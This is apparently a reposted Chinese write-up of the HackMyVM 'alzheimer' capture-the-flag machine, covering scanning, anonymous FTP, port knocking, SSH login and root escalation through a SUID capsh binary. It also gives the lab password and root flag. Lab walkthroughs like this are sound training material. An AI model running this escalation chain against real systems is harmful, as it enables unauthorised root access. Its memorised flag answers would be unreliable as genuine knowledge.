热门标签
热门文章
- 1Samba服务器的搭建与配置_samba用户数据共享系统总体结构设计怎么写
- 2linux进程系统调用_linux创建进程的系统调用
- 3Android关于侧边栏的简单使用(drawerLayout,navigationview,动态添加menu)_android drawerlayout 动态添加
- 4Mysql一列拆分多列例子_sql将一列数据拆分成多列
- 5鸿蒙os未来前景,华为:如果鸿蒙成功 未来20年将属于中国
- 6前端面试题汇总(vue+html基础)最新最全_vue和html面试题
- 7Fiddler抓不到浏览器包的原因_fiddler打开了没有收到浏览器请求
- 8Android中的回调Callback
- 9不能说最全但是也很全的MyBatis学习笔记_尚硅谷杨博超mybatis笔记
- 10论文阅读——《Retinexformer: One-stage Retinex-based Transformer for Low-light Image Enhancement》
当前位置: article > 正文
alzheimer ---hackmyvm
作者:你好赵伟 | 2024-03-08 14:26:44
赞
踩
alzheimer ---hackmyvm
alzheimer —hackmyvm
1.扫描网段
┌──(root㉿kali)-[/home/ace] └─# nmap -sP 192.168.56.0/24 Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-23 16:51 CST Nmap scan report for 192.168.56.1 Host is up (0.00033s latency). MAC Address: 0A:00:27:00:00:0A (Unknown) Nmap scan report for 192.168.56.100 Host is up (0.00019s latency). MAC Address: 08:00:27:F1:8F:2D (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.56.128 Host is up (0.0021s latency). MAC Address: 08:00:27:79:7F:2F (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.56.127 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.01 seconds
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
2.扫描端口
┌──(root㉿kali)-[/home/ace] └─# nmap -sC -sV -p- 192.168.56.128 Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-23 16:51 CST Nmap scan report for 192.168.56.128 Host is up (0.0013s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.56.127 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp filtered ssh 80/tcp filtered http MAC Address: 08:00:27:79:7F:2F (Oracle VirtualBox virtual NIC) Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
3.由上述结果可知,ftp连接使用anonymous空密码登录
┌──(root㉿kali)-[/home/ace] └─# ftp 192.168.56.128 Connected to 192.168.56.128. 220 (vsFTPd 3.0.3) Name (192.168.56.128:ace): Anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -al 229 Entering Extended Passive Mode (|||31145|) 150 Here comes the directory listing. drwxr-xr-x 2 0 113 4096 Oct 03 2020 . drwxr-xr-x 2 0 113 4096 Oct 03 2020 .. -rw-r--r-- 1 0 0 70 Oct 03 2020 .secretnote.txt 226 Directory send OK. ftp> get .secretnote.txt local: .secretnote.txt remote: .secretnote.txt 229 Entering Extended Passive Mode (|||22343|) 150 Opening BINARY mode data connection for .secretnote.txt (70 bytes). 100% |*****************************************************************************************************| 70 33.75 KiB/s 00:00 ETA 226 Transfer complete. 70 bytes received in 00:00 (18.70 KiB/s) ftp>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
4.查看文件
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-J1l0tpsU-1690107369393)(F:%5CDESKTOP%5C%E6%B8%97%E9%80%8F%5Cimage%5Cimage-20230723175853705.png)]
说明要使用knockd工具打开端口
┌──(root㉿kali)-[/home/ace]
└─# knock 192.168.56.128 1000:tcp 2000:tcp 3000:tcp -v
hitting tcp 192.168.56.128:1000
hitting tcp 192.168.56.128:2000
hitting tcp 192.168.56.128:3000
- 1
- 2
- 3
- 4
- 5
再度扫描端口:
┌──(root㉿kali)-[/home/ace] └─# nmap -sC -sV -p- 192.168.56.128 Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-23 17:35 CST Nmap scan report for 192.168.56.128 Host is up (0.0015s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.56.127 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 b13b2b36e56bd72a6defbfda0a5d2d43 (RSA) | 256 35f170aba366f1d6d72cf7d1247a5f2b (ECDSA) |_ 256 be15fab681d67fabc81c97a5ea11854e (ED25519) 80/tcp open http nginx 1.14.2 |_http-title: Site doesn't have a title (text/html). |_http-server-header: nginx/1.14.2 MAC Address: 08:00:27:79:7F:2F (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.62 seconds
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
80端口开放了 ,即网页可进行访问了
┌──(root㉿kali)-[/home/ace]
└─# curl -l 192.168.56.128
I dont remember where I stored my password :(
I only remember that was into a .txt file...
-medusa
<!---. --- - .... .. -. --. -->
- 1
- 2
- 3
- 4
- 5
- 6
- 7
5.wfuzz扫一下
┌──(root㉿kali)-[/home/ace] └─# wfuzz -c --hc=404 -t200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt http://192.168.56.128/FUZZ.txt /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://192.168.56.128/FUZZ.txt Total requests: 220560 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000001: 200 5 L 27 W 132 Ch "# directory-list-2.3-medium.txt" 000000007: 200 5 L 27 W 132 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/" 000000003: 200 5 L 27 W 132 Ch "# Copyright 2007 James Fisher" 000000004: 200 5 L 27 W 132 Ch "#" 000000002: 200 5 L 27 W 132 Ch "#" 000000005: 200 5 L 27 W 132 Ch "# This work is licensed under the Creative Commons" 000000008: 200 5 L 27 W 132 Ch "# or send a letter to Creative Commons, 171 Second Street," 000000006: 200 5 L 27 W 132 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this" 000000009: 200 5 L 27 W 132 Ch "# Suite 300, San Francisco, California, 94105, USA." 000000010: 200 5 L 27 W 132 Ch "#" 000000011: 200 5 L 27 W 132 Ch "# Priority ordered case-sensitive list, where entries were found" 000000012: 200 5 L 27 W 132 Ch "# on at least 2 different hosts" 000000013: 200 5 L 27 W 132 Ch "#" Total time: 0 Processed Requests: 220560 Filtered Requests: 220547 Requests/sec.: 0
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
6.尝试登录ssh
密码:Ihavebeenalwayshere!!!
登陆成功:
┌──(root㉿kali)-[/home/ace] └─# ssh medusa@192.168.56.128 The authenticity of host '192.168.56.128 (192.168.56.128)' can't be established. ED25519 key fingerprint is SHA256:O2S8HAtlJxSTJJgIQUiIzsbSKX/qj9Thyn38JM6wsBY. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.56.128' (ED25519) to the list of known hosts. medusa@192.168.56.128's password: Linux alzheimer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Oct 3 06:00:36 2020 from 192.168.1.58 medusa@alzheimer:~$
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
7.提权
medusa@alzheimer:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/sbin/capsh
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
发现:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0si0WGSA-1690107369394)(F:%5CDESKTOP%5C%E6%B8%97%E9%80%8F%5Cimage%5Cimage-20230723180449391.png)]
medusa@alzheimer:~$ /usr/sbin/capsh --gid=0 --uid=0 --
root@alzheimer:~#
- 1
- 2
root@alzheimer:~# cd root
bash: cd: root: No such file or directory
root@alzheimer:~# cd ..
root@alzheimer:/home# cd .
root@alzheimer:/home# cd ..
root@alzheimer:/# ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
root@alzheimer:/# cd root
root@alzheimer:/root# ls
root.txt
root@alzheimer:/root# cat root.txt
HMVlovememories
root@alzheimer:/root#
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
root@alzheimer:/# cd root
root@alzheimer:/root# ls
root.txt
root@alzheimer:/root# cat root.txt
HMVlovememories
root@alzheimer:/root#
- 1
声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
